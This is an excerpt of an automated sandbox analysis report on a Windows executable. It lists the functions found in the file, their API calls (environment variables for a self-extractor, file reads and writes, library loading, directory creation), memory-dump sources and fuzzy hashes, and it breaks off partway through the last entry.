C:\Users\user\Desktop\5Ixz5yVfS7.exe, xrefs: 005B76F4, 005B76FB, 005B772A, 005B7762

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\5Ixz5yVfS7.exe
API String ID: 2506810119-1928915766
Opcode ID: 03dbb69dd1948e4a7e2bfe6ae9f8848b157f246561d7d6186f0095acc8ed268c
Instruction ID: edcb0281b658e3979893c48e7e698523f14688f3705a475769ac759bd03b3e25
Opcode Fuzzy Hash: 03dbb69dd1948e4a7e2bfe6ae9f8848b157f246561d7d6186f0095acc8ed268c
Instruction Fuzzy Hash: F1318D71A04619EFDB219F999C859EEBFECFBD8310F244066E404D7601DA706E44DB94

Function 005AD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 005AD29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 005AD2D9

Strings

sfxpar, xrefs: 005AD2D4
sfxcmd, xrefs: 005AD298

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 9d5ad181a042ef67ac26e4c6edf34184941452d9d01fc6d3ae064a8cb676cd18
Instruction ID: 1a77453ffef91dc5f520949a31cb1130ecb010abc07d7c02e1217b9ded65432c
Opcode Fuzzy Hash: 9d5ad181a042ef67ac26e4c6edf34184941452d9d01fc6d3ae064a8cb676cd18
Instruction Fuzzy Hash: 28F0A77180062CAACB203FD09C0EFBE7F69BF1A741B044416FC85A6141D660DD40D7F1

Function 0059984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0059985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00599876
GetLastError.KERNEL32 ref: 005998A8
GetLastError.KERNEL32 ref: 005998C7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3fb876bf4d3ec6e745b38ee4e75bfe049443bbc1e14d572f1e3d167b24463988
Instruction ID: f24ac1ff96ff8a4f7ed738a1739c234bb9d7f9da27057298dc42ed76d90501f6
Opcode Fuzzy Hash: 3fb876bf4d3ec6e745b38ee4e75bfe049443bbc1e14d572f1e3d167b24463988
Instruction Fuzzy Hash: BE11CE31900608EFDF205B59C808AB93FACFB92731F10C52EF82A95580D7359E449F52

Function 005BA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0059CFE0,00000000,00000000,?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue), ref: 005BA526
GetLastError.KERNEL32(?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue,005C7348,005C7350,00000000,00000364,?,005B9077), ref: 005BA532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue,005C7348,005C7350,00000000), ref: 005BA540

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 496d05785516ca3d0a0ec375d8d4d34b99938a947c21edbe1fa815c8c02033c9
Instruction ID: 1d34487a1aa45a64947fc28cbebccb68ad1b16473edd2731a754b36fce8835cb
Opcode Fuzzy Hash: 496d05785516ca3d0a0ec375d8d4d34b99938a947c21edbe1fa815c8c02033c9
Instruction Fuzzy Hash: F501F732611626AFCF318A7C9C48EE67F58BF55BA1B244520F906D31C0D721EB04CAE1

Function 005BB188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 005B8FA5: GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
Part of subcall function 005B8FA5: _free.LIBCMT ref: 005B8FDC
Part of subcall function 005B8FA5: SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
Part of subcall function 005B8FA5: _abort.LIBCMT ref: 005B9023

Part of subcall function 005BB2AE: _abort.LIBCMT ref: 005BB2E0
Part of subcall function 005BB2AE: _free.LIBCMT ref: 005BB314

Part of subcall function 005BAF1B: GetOEMCP.KERNEL32(00000000,?,?,005BB1A5,?), ref: 005BAF46

_free.LIBCMT ref: 005BB200
_free.LIBCMT ref: 005BB236

Strings

\, xrefs: 005BB22A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: \
API String ID: 2991157371-1951137136
Opcode ID: 85c8741a4a93095362f7a83175bbb8aebea7a2dee251dba1d981a3e8b6cc58c7
Instruction ID: 87248ffd9fe581163d12e57bcb3f40ff18b7f9a5eb0396b73e738edf4ac55f66
Opcode Fuzzy Hash: 85c8741a4a93095362f7a83175bbb8aebea7a2dee251dba1d981a3e8b6cc58c7
Instruction Fuzzy Hash: 4A319131904209AFEB10EFA9D845AEDBFE5FF85320F254099E4149B291EBF2AD41CB50

Function 00599F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0059CC94,00000001,?,?,?,00000000,005A4ECD,?,?,?), ref: 00599F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,005A4ECD,?,?,?,?,?,005A4972,?), ref: 00599F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0059CC94,00000001,?,?), ref: 00599FB8

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 61bf4f7f6cbb75a46b9bc899c72c0a80cb9e5c38c441bc3b0002f6ba4737f2f0
Instruction ID: 445aa9040e36ac451a28be9fc12f1ca0ffe86d3dc9973aad31580aeb09f10700
Opcode Fuzzy Hash: 61bf4f7f6cbb75a46b9bc899c72c0a80cb9e5c38c441bc3b0002f6ba4737f2f0
Instruction Fuzzy Hash: C231C2712083059FDF258F28D948B6AFFA8FB94710F048A5DF9459A281CB75D948CBB2

Function 0059A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A261
GetLastError.KERNEL32(?,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A27E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 11832d0e7ef50557b4c683d09054f2a76d69db022e7a94d36315fcbd306e1e61
Instruction ID: ab7816d515c7385d512c144d09235111907ee5d68f9c011137dc54bfd7bb8b0d
Opcode Fuzzy Hash: 11832d0e7ef50557b4c683d09054f2a76d69db022e7a94d36315fcbd306e1e61
Instruction Fuzzy Hash: C901D23914061966EF32AB744C0DBEE3B48BF46B81F084851F800E5051DB66DA40D6F3

Function 005BAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 005BB019

Strings

, xrefs: 005BB05E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: e9f1861166165c4d2aef82be62b715f0ae4178d6390d89b349050ac574257031
Instruction ID: 051cf1588e0c0662335c29752316c2c0d2f181f94c66b289956c4dc8b972465a
Opcode Fuzzy Hash: e9f1861166165c4d2aef82be62b715f0ae4178d6390d89b349050ac574257031
Instruction Fuzzy Hash: C841F77050424C9EEB228A68CC99AFABFA9FB45304F1404EDE59A87142D3B5AE45DF20

Function 005BA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 005BA79D

Strings

LCMapStringEx, xrefs: 005BA73D, 005BA747

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 566183167019a7693069d0f922f55299cfdfafc02e76b460cd1727862c31b385
Instruction ID: 7082eb3ce80ca18a97365f730831e984633ee5f9c4a8035a312d50ffbf82ffb2
Opcode Fuzzy Hash: 566183167019a7693069d0f922f55299cfdfafc02e76b460cd1727862c31b385
Instruction Fuzzy Hash: 4501023250420DBBCF025FA0DD06DEE7F76FB48720F018554FE1425160CA729921BB91

Function 005BA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,005B9D2F), ref: 005BA715

Strings

InitializeCriticalSectionEx, xrefs: 005BA6E5

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 0b71a5cb79bda2af539ceb963aa8e1c8cc0cef0962cdf99313f49af487c3c2ac
Instruction ID: e86ee43ca70ae32ac2568c2c64ab637fb4a4133767461a351fc2f2d09a34e9c9
Opcode Fuzzy Hash: 0b71a5cb79bda2af539ceb963aa8e1c8cc0cef0962cdf99313f49af487c3c2ac
Instruction Fuzzy Hash: ABF09A3164561CBFCB116FA0DC0ADAE7F61FB59B20B008468FC091A260DA716A50AB91

Function 005BA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 005BA5AE

Strings

FlsAlloc, xrefs: 005BA58A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5bf649ed2d27feba2cddef93f317a4984cebd78bc26f555633c138bd5e77fae6
Instruction ID: 89fe6d6b2a3a07f382af8f6e2878a8c8c06945858e6456af971cf31b4bd85928
Opcode Fuzzy Hash: 5bf649ed2d27feba2cddef93f317a4984cebd78bc26f555633c138bd5e77fae6
Instruction Fuzzy Hash: 41E05C7074561C6FC7206B949C06DEDBF64FB65B10B404018FC0417240DD746F41A6D5

Function 005B329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 005B32AF

Strings

FlsAlloc, xrefs: 005B329E, 005B32A8

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: ba69fbc8aa1a53edec3ae6246a3412bffe80a87bc39d1790db315a615304376a
Instruction ID: 0d4521666ea9c9353e560d3824941fde0c03b214b5bdf147bff44e286d6d5152
Opcode Fuzzy Hash: ba69fbc8aa1a53edec3ae6246a3412bffe80a87bc39d1790db315a615304376a
Instruction Fuzzy Hash: AED02B31780B397E821032C46C03FEEBE04A701FB5F450152FE082A242A46169C043C5

Function 005AE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AE20B

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Strings

3Qo, xrefs: 005AE1F9, 005AE205

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 90e641b82071a765c011c148a699d4ca365b392a3d6eefd12af473eccd81c0ac
Instruction ID: 446af79da1c1d20e9ae14b54397b2b4d8de0c0ed5204cbea74c96481d5b9e4f3
Opcode Fuzzy Hash: 90e641b82071a765c011c148a699d4ca365b392a3d6eefd12af473eccd81c0ac
Instruction Fuzzy Hash: 29B012D62AE0027D320C61407D0FE3F0F3CF8C1F90730841EB207D408099404D054032

Function 005BB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 005BAF1B: GetOEMCP.KERNEL32(00000000,?,?,005BB1A5,?), ref: 005BAF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,005BB1EA,?,00000000), ref: 005BB3C4
GetCPInfo.KERNEL32(00000000,005BB1EA,?,?,?,005BB1EA,?,00000000), ref: 005BB3D7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 6351fb7b4e662e2a6fc66d14a40811bc7f850ec2f99c1e09b738315bb839b23c
Instruction ID: f63343427cb7e79e4e36ef240ea65cc64bacd5f72208f0c87546bfc930a523c8
Opcode Fuzzy Hash: 6351fb7b4e662e2a6fc66d14a40811bc7f850ec2f99c1e09b738315bb839b23c
Instruction Fuzzy Hash: 4C5112B09002069EEF209F71C885AFABFE6FF41310F18856ED09686253D7F9B945CB91

Function 005A2C42 Relevance: 3.1, APIs: 2, Instructions: 112COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005A2DA4
__CxxThrowException@8.LIBVCRUNTIME ref: 005A2DBC

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 9845a50216893f17ec8da3d7d094b8d4de7a4423894c271f6db00c8fefdd5daa
Instruction ID: 027b13ce4c44bf4b50cfc93ea59c377cfb0f937dadfe3f2e7e46d37b3500c633
Opcode Fuzzy Hash: 9845a50216893f17ec8da3d7d094b8d4de7a4423894c271f6db00c8fefdd5daa
Instruction Fuzzy Hash: 0A413AB0A087426FD72CEB78E49AB9EFF94BF92304F04052EE55953183C770A854C796

Function 00591385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00591385

Part of subcall function 00596057: __EH_prolog.LIBCMT ref: 0059605C

Part of subcall function 0059C827: __EH_prolog.LIBCMT ref: 0059C82C
Part of subcall function 0059C827: new.LIBCMT ref: 0059C86F
Part of subcall function 0059C827: new.LIBCMT ref: 0059C893

new.LIBCMT ref: 005913FE

Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a3166fec72a7bc812e326b61927ac961c0c9faf8948b0a48f448285db1e8a664
Instruction ID: 13741cef7fe79700ca1a65f35a4d3082ffd612a866467330de288e55f4b922df
Opcode Fuzzy Hash: a3166fec72a7bc812e326b61927ac961c0c9faf8948b0a48f448285db1e8a664
Instruction Fuzzy Hash: B14126B0805B419EEB24DF7984899E6FFE5FF19300F404A2ED2EE83282DB326554CB15

Function 00591380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00591385

Part of subcall function 00596057: __EH_prolog.LIBCMT ref: 0059605C

Part of subcall function 0059C827: __EH_prolog.LIBCMT ref: 0059C82C
Part of subcall function 0059C827: new.LIBCMT ref: 0059C86F
Part of subcall function 0059C827: new.LIBCMT ref: 0059C893

new.LIBCMT ref: 005913FE

Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
